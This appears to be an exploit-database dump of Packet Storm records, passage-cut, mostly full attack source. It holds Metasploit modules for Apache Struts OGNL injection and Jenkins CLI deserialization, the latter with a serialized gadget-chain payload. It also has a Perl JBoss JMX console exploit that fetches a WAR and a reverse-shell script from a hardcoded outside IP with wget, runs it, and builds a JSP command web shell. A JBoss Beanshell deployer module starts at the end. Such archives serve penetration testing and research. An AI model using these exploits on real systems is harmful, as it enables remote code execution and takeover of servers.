"2013-03-22T00:00:00", "id": "PACKETSTORM:120908", "href": 
"https://packetstormsecurity.com/files/120908/Apache-Struts-ParametersInterceptor-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache Struts \nversions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows \nfor the use of parentheses which in turn allows it to interpret parameter values as \nOGNL expressions during certain exception handling for mismatched data types of \nproperties which allows remote attackers to execute arbitrary Java code via a \ncrafted parameter. 
\n}, \n'Author' => \n[ \n'Meder Kydyraliev', # Vulnerability Discovery and PoC \n'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module \n'mihi' #ARCH_JAVA support \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2011-3923'], \n[ 'OSVDB', '78501'], \n[ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'], \n[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009'] \n], \n'Platform' => [ 'win', 'linux', 'java'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'windows' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n}, \n] \n], \n'DisclosureDate' => 'Oct 01 2011', \n'DefaultTarget' => 2)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',\"username\"]), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', \"/blank-struts2/login.action?INJECT\"]), \nOptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \ninject = \"PARAMETERTOKEN=(#context[\\\"xwork.MethodAccessor.denyMethodExecution\\\"]=+new+java.lang.Boolean(false),#_memberAccess[\\\"allowStaticMethodAccess\\\"]\" \ninject << \"=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true\" \ninject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) \ninject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) \nuri = String.new(datastore['TARGETURI']) \nuri = normalize_uri(uri) \nuri.gsub!(/INJECT/,inject) # append the injection string \nresp = send_request_cgi({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}) \nreturn resp #Used for check function. 
\nend \n \ndef exploit \n#Set up generic values. \n@payload_exe = rand_text_alphanumeric(4+rand(4)) \npl_exe = generate_payload_exe \nappend = 'false' \n#Now arch specific... \ncase target['Platform'] \nwhen 'linux' \n@payload_exe = \"/tmp/#{@payload_exe}\" \nchmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\" \nwhen 'java' \n@payload_exe << \".jar\" \npl_exe = payload.encoded_jar.pack \nexec_cmd = \"\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,true),\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,false),\" \nexec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\" \nexec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\" \nexec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\" \nexec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\" \nwhen 'windows' \n@payload_exe = \"./#{@payload_exe}.exe\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\" \nelse \nfail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!') \nend \n \n#Now with all the arch specific stuff set, perform the upload. \n#109 = length of command string plus the max length of append. 
\nsub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length \nchunk_length = 2048 - sub_from_chunk \nchunk_length = ((chunk_length/4).floor)*3 \nwhile pl_exe.length > chunk_length \njava_upload_part(pl_exe[0,chunk_length],@payload_exe,append) \npl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] \nappend = true \nend \njava_upload_part(pl_exe,@payload_exe,append) \nexecute_command(chmod_cmd) if target['Platform'] == 'linux' \nexecute_command(exec_cmd) \nregister_files_for_cleanup(@payload_exe) \nend \n \ndef java_upload_part(part, filename, append = 'false') \ncmd = \"\" \ncmd << \"#f=new java.io.FileOutputStream('#(unknown)',#{append}),\" \ncmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\" \ncmd << \"#f.close()\" \nexecute_command(cmd) \nend \n \ndef check \nsleep_time = datastore['CHECK_SLEEPTIME'] \ncheck_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\" \nt1 = Time.now \nprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\") \nresponse = execute_command(check_cmd) \nt2 = Time.now \ndelta = t2 - t1 \n \n \nif response.nil? 
\nreturn Exploit::CheckCode::Safe \nelsif delta < sleep_time \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/120908/struts_code_exec_parameters.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-09-22T18:47:02", "description": "", "cvss3": {}, "published": "2020-09-22T00:00:00", "type": "packetstorm", "title": "Jenkins 2.56 CLI Deserialization / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-22T00:00:00", "id": "PACKETSTORM:159266", "href": "https://packetstormsecurity.com/files/159266/Jenkins-2.56-CLI-Deserialization-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \nprepend Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Jenkins CLI Deserialization', \n'Description' => %q{ \nAn unauthenticated Java object deserialization vulnerability exists \nin the CLI component for Jenkins versions `v2.56` and below. \n \nThe `readFrom` method within the `Command` class in the Jenkins \nCLI remoting component deserializes objects received from clients without \nfirst checking / sanitizing the data. Because of this, a malicious serialized \nobject contained within a serialized `SignedObject` can be sent to the Jenkins \nendpoint to achieve code execution on the target. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'SSD', # PoC \n'Unknown', # Vulnerability discovery \n'Shelby Pace' # Metasploit module \n], \n'References' => \n[ \n[ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'], \n[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'], \n[ 'CVE', '2017-1000353'] \n], \n'Privileged' => false, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Targets' => \n[ \n[ \n'Linux', \n{ \n'Platform' => 'linux', \n'CmdStagerFlavor' => [ 'wget', 'curl' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n] \n], \n'DisclosureDate' => '2017-04-26', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'SideEffects' => [ IOC_IN_LOGS ] \n}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The base path to Jenkins', '/' ]) \n] \n) \nend \n \ndef check \nlogin_uri = normalize_uri(target_uri.path, 'login') \nlogin_res = send_request_cgi( \n'method' => 'GET', \n'uri' => login_uri \n) \n \nreturn Exploit::CheckCode::Unknown('Did not receive a response from the server') unless login_res \n \n/Jenkins\\s+ver\\.\\s+(?<version>\\d+(?:\\.\\d+)*)/ =~ login_res.body \nreturn Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version \n \nvers_no = Gem::Version.new(version) \nreturn Exploit::CheckCode::Appears(\"Jenkins version #{version} detected\") if vers_no < Gem::Version.new('2.54') \n \nExploit::CheckCode::Detected \nend \n \ndef exploit \nprint_status('Sending payload...') \nexecute_cmdstager(noconcat: true) \nend \n \ndef format_payload(payload_data) \nformatted_payload = '74' \nformatted_payload << payload_data.length.to_s(16).rjust(4, '0') \nformatted_payload << payload_data.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join \nend \n \ndef execute_command(cmd, _opts = {}) 
\nsess_uuid = SecureRandom.uuid \nsess_uri = normalize_uri(target_uri.path, 'cli') \npreamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' \n \nsend_request_cgi( \n{ \n'uri' => sess_uri, \n'method' => 'POST', \n'headers' => \n{ \n'Side' => 'download', \n'Session' => sess_uuid \n} \n}, \nnil, false \n) # don't wait for response, and don't disconnect \n \ncmd = build_obj(cmd) \nsend_request_cgi( \n{ \n'uri' => sess_uri, \n'method' => 'POST', \n'data' => preamble + [ cmd ].pack('H*'), \n'headers' => \n{ \n'Side' => 'upload', \n'Session' => sess_uuid \n} \n} \n) \nsleep(2) # give buffer time between requests for processing \nend \n \ndef build_obj(obj_data) \npayload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61' \npayload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742' \npayload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265' \npayload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5' \npayload_data << '77269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e' \npayload_data << '436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e637572726' \npayload_data << '56e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63' \npayload_data << '757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6' \npayload_data << 'd70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f' \npayload_data << 
```ruby
    '6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537'
    payload_data << '472696e673b7870757200025b42acf317f8060854e002000078700000050daced0005737200116a6176612e7574696c2e48617368536574ba44'
    payload_data << '859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6'
    payload_data << 'e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a'
    payload_data << '6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e7'
    payload_data << '32e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61706163'
    payload_data << '68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6'
    payload_data << 'e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d6954'
    payload_data << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d657'
    payload_data << '23b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8'
    payload_data << '3418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436'
    payload_data << 'f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c'
    payload_data << '616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e7'
    payload_data << '32e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f'
    payload_data << '6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d547'
    payload_data << '97065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c'
    payload_data << '02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000078700'
    payload_data << '00000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078'
    payload_data << '707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106'
    payload_data << 'a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013'
    payload_data << '75720013'
    payload_data << '5b4c6a6176612e6c616e672e537472696e673b'
    payload_data << 'add256e7e91d7b47'
    payload_data << '020000'
    payload_data << '7870'
    payload_data << '00000001'

    obj_data = format_payload(obj_data)
    payload_data << obj_data

    payload_data << '740004'
    payload_data << '65786563' # exec
    payload_data << '7571007e0'
    payload_data << '01b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756578'
    payload_data << '7200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700'
    payload_data << '507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878'
    payload_data << '787571007e00110000002f302d02147ed1e347cfebac075517d658628ac128211d8895021500945aaa3b69fb24194cdf22bcee9fc9c5e317266'

    # This index is the length of the serialized
    # object that belongs to the SignedObject
    start_arr = payload_data.index('050daced')
    end_arr = payload_data.index('787571007e')
    new_arr_len = ((end_arr + 2) / 2) - ((start_arr + 4) / 2)
    payload_data[start_arr, 4] = new_arr_len.to_s(16).rjust(4, '0')

    payload_data << '0740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72'
    payload_data << '672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced5302000'
    payload_data << '14c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c'
    payload_data << '656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b03000078707'
    payload_data << '37200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c'
    payload_data << '656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136'
    payload_data << 'a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740004617364667878'
    payload_data << '7371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078'
  end
end
```

* CVSS v2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
* Download: https://packetstormsecurity.com/files/download/159266/jenkins_cli_deserialization.rb.txt

### JBoss addURL Misconfiguration Attack

* Source: Packet Storm, PACKETSTORM:105520, published 2011-10-03
* CVE: CVE-2010-0738
* CVSS v2: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
* https://packetstormsecurity.com/files/105520/JBoss-addURL-Misconfiguration-Attack.html
* Download: https://packetstormsecurity.com/files/download/105520/jboss-addurl.txt

```perl
#!/usr/bin/perl
# Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner
# Date: Oct 3 2011
# Author: y0ug <at> codsec.com
# Version:
# Tested on: Linux
# CVE : CVE-2010-0738
#
# POC against misconfigured JBoss JMX Console
# It use the addUrl method in DeploymentScanner module
#
# More information
# http://packetstormsecurity.org/files/download/105479/JBossWhitepaper.pdf
# http://poc-hack.blogspot.com/2011/02/how-to-hack-any-version-of-jboss.html
#
# You need to edit
# $url_cmd to match the war payload url
# $url_shell is your reverse shell url
# ( only if you want to use reverse_shell("ip", "port") )
#
# The JSP shell is not mine is available every where
# I add a -b param that build the war contener to do this you need java
#
# Is a fast POC coded this morning for fun so maybe it don't cover all case/version
#
# Usage:
# Build the war contener (need java)
# ./jboss -b
# Hack
# ./jboss http://www.vuln.com:8080

use strict;

use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
use IO::Socket::SSL;
use Cwd;

# configuration section
my $url_cmd = "http://78.46.149.64/cmd.war";
my $url_shell = "http://78.46.149.64/reverse.pl";
my $debug = 0; # 1 to switch to debug
my $useragent = "'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) ".
    "Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)'";

# Don't edit from here
my $installed = 0;
my $url;

my $ua = LWP::UserAgent->new;

$SIG{INT} = "sigtrap";

sub debug {
    if( $debug ){
        print STDERR "debug: ", @_, "\n";
    }
}

sub check_url {
    my $request = GET "$url/jmx-console/";
    my $response = $ua->request($request);
    if (!$response->is_success) {
        print STDERR $response->status_line, "\n";
        return -1;
    }
    return 0;
}

sub sigtrap {
    if ( $installed ){
        print " [*] Clean of $url in progress...\n";
        clean_war();
    }
    exit 1;
}

sub find_method_index {
    my $method = shift(@_);

    my $request = GET "$url/jmx-console/HtmlAdaptor?" .
        "action=inspectMBean&name=jboss.deployment" .
        "%3Aflavor%3DURL%2Ctype%3DDeploymentScanner";

    my $response = $ua->request($request);
    if (!$response->is_success) {
        print STDERR $response->status_line, "\n";
        return -1;
    }
    my $page = $response->decoded_content;

    # Match a certain jboss version
    while ( $page =~ m{<form method="post" action="HtmlAdaptor">(.*?)</form>}sg ){
        my $form = $1;
        if ( $form =~ /$method/ ){
            if ( $form =~ /<input type="hidden" name="methodIndex" value="(\d+)">/ ){
                debug("method $method at index $1");
                return $1;
            }
        }
    }

    # Match another jboss version
    while ( $page =~ m{<td class='param'>$method</td>(.*?)</tr>}sg ){
        my $form = $1;
        if ( $form =~ /<input type='hidden' name='methodIndex' value='(\d+)'\/>/ ){
            debug("method $method at index $1");
            return $1;
        }
    }

    # Match another jboss version
    while ( $page =~ m{<span class='aname'>$method</span>(.*?)<table>}sg ){
        my $form = $1;
        if ( $form =~ /<input type="hidden" name="methodIndex" value="(\d+)" \/>/ ){
            debug("method $method at index $1");
            return $1;
        }
    }
    return -1;
}

sub is_installed_war {
    my $method_index = find_method_index("hasURL");
    if ( $method_index < 0 ) { print "Can't find methodIndex for hasURL\n"; return -1; }
    my $request = POST "$url/jmx-console/HtmlAdaptor", { action => 'invokeOp',
        name => 'jboss.deployment:type=DeploymentScanner,flavor=URL',
        methodIndex => "$method_index", arg0 => $url_cmd};
    my $response = $ua->request($request);
    if (!$response->is_success) {
        print STDERR $response->status_line, "\n";
        return -1;
    }
    my $page = $response->decoded_content;

    if ( $page =~ m{<pre>(.*?)</pre>}s ){
        my $ret = $1;
        if ( $ret =~ /true/ ){
            return 1;
        }else{
            return 0;
        }
    }else{
        print STDERR "error: occured during is_installed_war regex!\n";
        return -2;
    }
}

sub install_war {
    if (is_installed_war == 1){
        print " [*] Install canceled, already installed\n";
        return 1;
    }
    my $method_index = find_method_index("addURL");
    if ( $method_index < 0 ) { print "Can't find methodIndex for addURL\n"; return -1; }

    my $request = POST "$url/jmx-console/HtmlAdaptor", { action => 'invokeOp',
        name => 'jboss.deployment:type=DeploymentScanner,flavor=URL',
        methodIndex => "$method_index", arg0 => $url_cmd};
    my $response = $ua->request($request);
    if (!$response->is_success) {
        print STDERR $response->status_line, "\n";
        return -1;
    }
    my $page = $response->decoded_content;

    if ( $page =~ m{<span class='OpResult'>(.*?)</span>}s ){
        print " [*] ", trim($1), "\n";
        return 0;
    }elsif ( $page =~ m{<pre>(.*?)</pre>}s ){
        print " [*] ", trim($1), "\n";
        return 0;
    }elsif ( $page =~ m{</table>(.*?)</body>}s ){
        print " [*] ", trim($1), "\n";
        return 0;
    }else{
        print STDERR "error: occured during install_war regex!\n";
        return -1;
    }
}

sub clean_war {
    while(is_installed_war == 1){
        if ( uninstall_war() < 0 ){
            return -1;
        }
    }
    print " [*] Clean complete\n";
    return 0;
}

sub uninstall_war {
    my $method_index = find_method_index("removeURL");
    if ( $method_index < 0 ) { print "Can't find methodIndex for removeURL\n"; return -1; }
    my $request = POST "$url/jmx-console/HtmlAdaptor", { action => 'invokeOp',
        name => 'jboss.deployment:type=DeploymentScanner,flavor=URL',
        methodIndex => "$method_index", arg0 => $url_cmd};
    my $response = $ua->request($request);
    if (!$response->is_success) {
        print STDERR $response->status_line, "\n";
        return -1;
    }
    my $page = $response->decoded_content;

    if ( $page =~ m{<span class='OpResult'>(.*?)</span>}s ){
        print " [*] ", trim($1), "\n";
        return 0;
    }elsif ( $page =~ m{<pre>(.*?)</pre>}s ){
        print " [*] ", trim($1), "\n";
        return 0;
    }elsif ( $page =~ m{</table>(.*?)</body>}s ){
        print " [*] ", trim($1), "\n";
        return 0;
    }else{
        print STDERR "error: occured during uninstall_war regex!\n";
        return -1;
    }
}

sub execute {
    my $cmd = shift(@_);
    print '$ ' . $cmd . "\n";

    my $request = POST "$url/cmd/cmd.jsp", { cmd => $cmd};
    my $response = $ua->request($request);
    if (!$response->is_success) {
        if ( $response->code == 404 ){
            print STDERR "Command war contener is not installed!\n";
        }else{
            print STDERR $response->status_line, "\n";
        }
        return -1;
    }
    my $page = $response->decoded_content;

    my $content = $page;

    if ( $content =~ m{<BR>(.*)</pre>}s ){
        print trim($1) . "\n";
        return 0;
    }else{
        print STDERR "error: occured during exec regex!\n";
        return -1;
    }
}

sub reverse_shell {
    my ($ip, $port) = @_;
    print " [*] reverse shell to $ip $port\n";
    my $cmd = "wget -O /tmp/a $url_shell";
    if ( execute($cmd) < 0 ){
        return -1;
    }
    if ( execute("chmod +x /tmp/a") < 0 ){
        return -1;
    }
    return execute("/tmp/a $ip $port");
}

sub trim($){
    my $string = shift;
    $string =~ s/^\s+//;
    $string =~ s/\s+$//;
    return $string;
}

sub setup {
    print " [*] Check url $url...\n";
    if ( check_url() < 0 ){
        print "Url $url not available!\n";
        return -1;
    }

    print " [*] Try to install command war contener...\n";
    return install_war;
}

sub check_cmd {
    my $t = 5;
    for( my $i = 1; $i <= $t ; ++$i ){
        my $request = GET "$url/cmd/cmd.jsp";
        my $response = $ua->request($request);
        if (!$response->is_success) {
            if ( $response->code != 404 ){
                print STDERR $response->status_line, "\n";
                return 0;
            }
            print(" [*] check_cmd $i/$t failed\n");
        }else{
            print(" [*] check_cmd $i/$t ok, gogogo!\n");
            return 1;
        }
        if ( $i < $t-1) {sleep(15); }
    }
    return 0;
}

sub help {
    print "Help\n";
    print " - Is a perl shell so you can call perl function\n";
    print " > execute(\"id\") # execute the commande\n";
    print " > reverse_shell(\"8.8.8.8\", \"1912\") # download your reverse shell and execute it\n";
    print " > clean # remove the war contener from the server\n";
    print " > check_cmd # loop until command available\n";
    print " > install_war # install the war contener from url\n";
    print " > exit # clean and quit\n";
    print " > exitd # exit without cleaning\n";
}

sub build_war {
    my $jsp_file = "cmd.jsp";
    open( my $jsp_output, '>', $jsp_file ) or
        die("Can't open $jsp_file : $!");

    print $jsp_output <<EOF;
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
EOF

    close($jsp_output);

    mkdir "WEB-INF";
    my $xml_file = "WEB-INF/web.xml";
    open( my $xml_output, '>', $xml_file ) or
        die("Can't open $xml_file : $!");
    print $xml_output <<EOF;
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>
EOF
    close($xml_output);

    system("jar cvf cmd.war WEB-INF/ $jsp_file");
    unlink($xml_file);
    unlink($jsp_file);
    rmdir("WEB-INF");

    print " [*] War contener is here ", getcwd, "/cmd.war\n";
    print " [*] Upload it to your server and update script url\n";
}

sub shell {
    do {
        print("> ");
        chop($_ = <STDIN>);
        if ( $_ eq "help" ) { help(); }
        if ( $_ eq "exitd" ) { exit 0; }
        elsif ( $_ ne "exit" ){ eval($_); }
        warn() if $@;
    } while ($_ ne "exit");
}

if($#ARGV+1 != 1){
    print " [*] Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner\n";
    print " [*] Date: Oct 3 2011\n";
    print " [*] Author: y0ug <at> codsec.com\n";
    print " [*] Version: 0.1\n";
    print " [*] JSP shell url $url_cmd\n\n";
    print " [*] Usage:\n";
    print " Build the war contener (need java)\n";
    print " $0 -b\n";
    print " Hack\n";
    print " $0 http://www.vuln.com:8080\n\n";

    exit 1;
}

if($ARGV[0] eq "-b"){
    build_war;
    exit 0;
}

$url = $ARGV[0];

$ua->agent($useragent);

print " [*] JSP shell url $url_cmd\n";

if ( setup() < 0 ){
    print " [*] Setup failed!\n";
    exit 1;
}
$installed = 1;
print " [*] Wait few minutes, times to JBoss to load the url\n";
print " [*] You can find the shell here too\n";
print " [*] $url/cmd/cmd.jsp\n";

if ( check_cmd() <= 0 ){
    print " [*] ## Exploit certainly failed! ##\n";
    print " [*] You can wait a little longer (run > check_cmd)\n";
}else{
    print " [*] Congrats, is up!\n";
    execute("id");
}

shell();

print " [*] Clean of $url in progress...\n";
clean_war();

exit(0);
```

### JBoss JMX Console Beanshell Deployer WAR Upload And Deployment

* Source: Packet Storm, PACKETSTORM:90957, published 2010-06-24
* CVE: CVE-2010-0738
* CVSS v2: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
* https://packetstormsecurity.com/files/90957/JBoss-JMX-Console-Beanshell-Deployer-WAR-Upload-And-Deployment.html
* Download: https://packetstormsecurity.com/files/download/90957/jboss_bshdeployer.rb.txt

```ruby
##
# $Id: jboss_bshdeployer.rb 9596 2010-06-23 22:25:03Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'JBoss JMX Console Beanshell Deployer WAR upload and deployment',
      'Description'    => %q{
        This module can be used to install a WAR file payload on JBoss servers that have
        an exposed "jmx-console" application. The payload is put on the server by
        using the jboss.system:BSHDeployer's createScriptDeployment() method.
      },
      'Author'         => [ 'Patrick Hof', 'jduck' ],
      'License'        => BSD_LICENSE,
      'Version'        => '$Revision: 9596 $',
      'References'     =>
        [
          [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
          [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
        ],
      'Privileged'     => true,
      'Platform'       => [ 'windows', 'linux' ],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'Universal',
            {
              'Arch'    => ARCH_JAVA,
              'Payload' =>
                {
                  'DisableNops' => true,
                },
            }
          ],
        ],
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(8080),
